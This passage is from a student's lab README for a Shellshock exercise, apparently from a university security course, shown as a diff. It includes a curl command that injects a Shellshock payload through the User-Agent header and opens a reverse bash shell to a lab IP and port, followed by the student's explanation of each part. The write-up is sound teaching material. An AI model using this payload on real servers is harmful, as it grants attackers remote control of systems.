LinShi11/csci-476-594-spring2021-private/lab02/README.md

         TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 [02/16/21]seed@VM:~/.../02_shellshock$ curl -A '() { :; }; echo Content_type: text/plain; echo; /bin/bash -i > /dev/tcp/172.17.0.1/9090 0<&1 2<&1' http://www.seedlab-shellshock.com/cgi-bin/getenv.cgi
 ```
 This one was pretty similar to the descriptions.
 I followed the guild and made a few changes.
 First, I used ifconfig to find the IP address.
 Since I was not 100% sure, I tried many of them until it was clear that it is docker0.
-Then I modified the command from /bin/bash -i ... to using curl to ask it to wait for some commands.
+Then I modified the command from /bin/bash -i ... to using curl to complete some action.
 Lastly, once everything was done, I was able to type id on the attacker and the server's id showed up. /bin/bash is the bash that we are using. i is interactive, which means that shell is interactive. > /dev/tcp/172.17.0.1/9090 causes the output device stdout of the shell to be redirected to the TCP connection to IP's port.
 0<&1 is stdin, stdout.
 2>&1 is stderr, stdout.
 The vulnerability at this point becomes more clear to me.
 If we were only talking about the hard-coding, I did not think it was going to cause such a headache.
 However, after looking at how an attack could easily take over the server, I began to understand the problem.

 ### Task 5:
 In this task, I am using the patched bash.
 First, I went into getenv.cgi and changed the first line from /bin/bash_shellshock to /bin/bash.
 Then I repeated Task 3: